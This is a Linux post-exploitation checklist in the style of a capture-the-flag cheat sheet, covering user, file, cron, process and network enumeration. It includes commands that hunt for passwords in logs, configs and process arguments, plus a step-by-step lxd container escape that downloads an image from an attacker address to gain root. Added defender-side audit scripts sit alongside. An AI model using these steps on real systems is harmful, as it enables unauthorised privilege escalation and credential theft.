Post Exploit Checks

General Enumeration

  • Know whether the environment is a real host or a container

ls -la / # a /.dockerenv file (or other unexpected dot files) in the root directory indicates a Docker container
hostname
  • Know the permissions of the user

sudo -l
id
  • Know the users

cat /etc/passwd
  • Check for .htaccess files and the other configuration files that commonly hold credentials or interesting settings:

  • /etc/apache2/sites-enabled/*

  • /etc/nginx/nginx.conf

  • /etc/ssh/sshd_config

  • Application-specific configs: wp-config.php, settings.php, etc.

Groups Exploitation

4(adm)

  • Members of the adm group can read the log files under /var/log, which may contain credentials

cd /var/log
grep -EnRi password .


116(lxd)

  • Members of the lxd group can start a privileged container that mounts the host's root filesystem, which gives root-level access to the host's files from inside the container

# attacker machine
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine

# victim machine
lxd init # accept the defaults (yes to all)
wget http://10.10.14.71/alpine-v3.15-x86_64-20220227_1714.tar.gz
lxc image import ./alpine-v3.15-x86_64-20220227_1714.tar.gz --alias myimage
lxc image list
lxc init myimage ignite -c security.privileged=true # expected output: Creating ignite
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true # expected output: Device mydevice added to ignite
lxc start ignite
lxc exec ignite /bin/sh # the shell inside the ignite container runs as root
cd /mnt/root # the host's root filesystem, mounted into the container
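Both group findings above come down to the same question for a defender: which accounts are in groups that give a path to root? The following is an added example, not part of the original notes, that answers it by parsing an /etc/group-format stream. The watchlist extends the page's adm and lxd with docker and sudo (an assumption for this example), and the sample file is constructed, not taken from a real host.

```shell
#!/bin/sh
# Added example: audit which accounts sit in groups that give a path to root.
# The watchlist is an assumption for this example; the page itself covers adm and lxd.
WATCH_GROUPS="adm lxd docker sudo"

# Reads an /etc/group-format stream (name:password:gid:member,member,...) from stdin
# and prints "gid group member" for every member of a watched group.
# Primary-group membership (the gid field in /etc/passwd) is not covered here.
sensitive_group_members() {
    while IFS=: read -r name _pw gid members || [ -n "$name" ]; do
        for g in $WATCH_GROUPS; do
            [ "$name" = "$g" ] || continue
            # members is a comma-separated list; an empty list yields one empty line
            printf '%s\n' "$members" | tr ',' '\n' | while read -r m; do
                if [ -n "$m" ]; then
                    printf '%s %s %s\n' "$gid" "$name" "$m"
                fi
            done
        done
    done
}

# Counts how many accounts the stream lists in one watched group (0 if unwatched or empty).
members_of_group() {
    sensitive_group_members | awk -v g="$1" '$2 == g { n++ } END { print n + 0 }'
}

# Constructed sample in /etc/group format (not a real host's file).
SAMPLE_GROUP='root:x:0:
adm:x:4:syslog,alice
lxd:x:116:alice,bob
docker:x:999:
sudo:x:27:alice
users:x:100:carol'

# Stand-alone demo; on a live host run: sensitive_group_members < /etc/group
printf '%s\n' "$SAMPLE_GROUP" | sensitive_group_members
```

On the sample this reports syslog and alice in adm, alice and bob in lxd, and alice in sudo; docker is watched but empty, and users is not watched. Any non-service account that shows up here should be reviewed, because the page's adm and lxd sections describe exactly what such membership allows.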

Files Enumeration

  • Find suid binaries

find / -perm /4000 -ls 2>/dev/null
  • Find writable files

find / -type f -writable 2>/dev/null | grep -v proc
  • Find files owned by a specific group

# ! -path <path>  - excludes files under the given directory
# -group <name>   - only files owned by that group
find / -group www-data ! -path "/proc/*" ! -path "/var/www*" 2>/dev/null
  • Locations to check

ls /opt
ls /usr/local/bin
ls ~/.local/bin

Background Jobs Enumeration

  • Crontabs

crontab -l
cat /etc/crontab
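The writable-files check and the crontab check above combine into one of the most common findings: a cron job, often running as root, whose program file anyone can edit. The block below is an added defender-side audit, not part of the original notes, that parses an /etc/crontab-format stream and reports jobs whose program is world-writable. The crontab and the two scripts it runs on are constructed for the example.

```shell
#!/bin/sh
# Added example: flag cron jobs whose program file is writable by everyone.
# The crontab format handled here is /etc/crontab (with a user field); the sample is constructed.

# Reads an /etc/crontab-format stream from stdin and prints "user program" per job line.
# Comments, blank lines and VAR=value assignments are skipped, @reboot-style lines are
# handled, and only the first word of the command is taken, so a job written as
# "cd / && run-parts ..." is reported as "cd".
cron_job_programs() {
    set -f                                  # cron fields such as "*" must not glob-expand
    while IFS= read -r line || [ -n "$line" ]; do
        set -- $line
        [ $# -gt 0 ] || continue
        case $1 in
            '#'*)          continue ;;
            [A-Za-z_]*=*)  continue ;;     # SHELL=/bin/sh, PATH=..., MAILTO=...
            @*)            [ $# -ge 3 ] || continue; user=$2; prog=$3 ;;
            *)             [ $# -ge 7 ] || continue; user=$6; prog=$7 ;;
        esac
        printf '%s %s\n' "$user" "$prog"
    done
    set +f
}

# Reports jobs whose program is an absolute path to an existing file with the
# other-write bit set (mode -002). Relative names resolve through PATH and are skipped.
world_writable_cron_programs() {
    cron_job_programs | while read -r user prog; do
        case $prog in /*) ;; *) continue ;; esac
        [ -f "$prog" ] || continue
        if [ -n "$(find "$prog" -prune -perm -002 -print 2>/dev/null)" ]; then
            printf 'WARNING: %s job runs world-writable %s\n' "$user" "$prog"
        fi
    done
}

# Constructed sample scripts: one with sane permissions, one world-writable.
setup_sample_scripts() {
    printf '#!/bin/sh\necho backup\n'  > "$1/backup.sh";  chmod 0755 "$1/backup.sh"
    printf '#!/bin/sh\necho cleanup\n' > "$1/cleanup.sh"; chmod 0777 "$1/cleanup.sh"
}

# Constructed /etc/crontab referencing the scripts in directory $1.
constructed_crontab() {
    printf 'SHELL=/bin/sh
PATH=/usr/bin:/bin
# m h dom mon dow user  command
17 *   * * *  root      cd / && run-parts --report /etc/cron.hourly
0  2   * * *  root      %s/backup.sh --full
*/5 *  * * *  www-data  %s/cleanup.sh
@reboot       root      %s/cleanup.sh
' "$1" "$1" "$1"
}

# Stand-alone demo; on a live host run: world_writable_cron_programs < /etc/crontab
demo_dir=$(mktemp -d)
setup_sample_scripts "$demo_dir"
constructed_crontab "$demo_dir" | world_writable_cron_programs
rm -rf "$demo_dir"
```

The demo prints two warnings, both for cleanup.sh: the www-data job and the @reboot root job. The root one is the finding that matters, since editing that file changes what root executes at the next boot; the check uses `find -perm -002` rather than `[ -w ]` so it reports the other-write bit regardless of which user runs the audit.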
  • Enumerate processes with pspy (it shows processes and cron jobs spawned by other users without needing root)

Network Enumeration

  • Know the network interfaces (the host may be talking to internal networks that are not reachable from outside)

ip a
  • Open Ports and services

netstat -antp
# look for unusual services bound only to localhost or internal interfaces, e.g. a mysql service

Process Enumeration

  • Enumerate the services that are running

ps aux
  • Get more information about a process (the arguments it was started with may contain passwords)

# take the process id from ps aux; arguments in cmdline are NUL-separated, so tr makes them readable
cat /proc/<processid>/cmdline | tr '\0' ' '
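Because /proc/<pid>/cmdline is readable by every local user, a password passed on a command line is exposed to the whole host. The block below is an added example, not part of the original notes, that decodes the NUL-separated format, finds such processes and prints their command lines with the secret masked, so the report itself does not leak it. The argument patterns it recognises (mysql-style `-p<secret>` and `--password=` / `PASSWORD=` key=value forms) are assumptions for this example, and the sample command lines are constructed.

```shell
#!/bin/sh
# Added example: find processes started with a credential on the command line and
# report them redacted. Patterns are assumptions for this example, not an exhaustive list.

# /proc/<pid>/cmdline separates arguments with NUL bytes; turn it into one line.
# (An argument that itself contains spaces is no longer distinguishable afterwards.)
decode_cmdline() {
    { tr '\0' ' '; echo; } | sed 's/ *$//'
}

# Masks the value of credential-bearing arguments in a raw or already decoded cmdline:
#   mysql/mysqldump/mysqladmin -p<secret>   (value glued to the flag; a bare -p is a prompt)
#   --password=<secret>, passwd=<secret>, DB_PASSWORD=<secret> and similar key=value forms
redact_cmdline() {
    decode_cmdline | sed -E \
        -e 's#((^|.*[ /])(mysql|mysqldump|mysqladmin)( .*)? -p)[^ ]+#\1***#' \
        -e 's#([A-Za-z_-]*([Pp]ass|PASS)([Ww]ord|WORD|wd|WD)?=)[^ ]+#\1***#g'
}

# True (exit 0) when redaction would change the command line, i.e. a credential is present.
has_credential_arg() {
    line=$(decode_cmdline)
    [ "$line" != "$(printf '%s\n' "$line" | redact_cmdline)" ]
}

# Live-host scan: every readable /proc/<pid>/cmdline (all of them unless /proc is mounted
# with hidepid), printing only the redacted command line of processes that carry a credential.
scan_proc_cmdlines() {
    for f in /proc/[0-9]*/cmdline; do
        [ -r "$f" ] || continue
        if has_credential_arg < "$f"; then
            pid=${f#/proc/}
            printf 'pid %s: %s\n' "${pid%/cmdline}" "$(redact_cmdline < "$f")"
        fi
    done
}

# Constructed samples (not captured from a real host); printf '\0' emits the NUL separators.
printf 'mysql\0-uroot\0-pS3cret\0wordpress\0' | redact_cmdline
printf '/usr/bin/python3\0app.py\0--password=hunter2\0' | redact_cmdline
if printf 'find\0/\0-path\0/proc\0' | has_credential_arg; then
    echo "unexpected: find flagged"
else
    echo "find: no credential on the command line"
fi
```

Run `scan_proc_cmdlines` on a host to get the live report. The mysql rule deliberately requires a value glued to `-p`, so `mysql -u root -p` (which prompts for the password) is not flagged, while `find / -path /proc` is not mistaken for a `-p` password because the rule is tied to the mysql client names.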

Web Directories

  • Check the web directories for passwords

/var/www/*

MYSQL

# Connecting to mysql
mysql -u root -p
# password prompt

mysql> select * from wp_users \G # \G replaces the ";" terminator and prints each row vertically, which is easier to read for wide tables
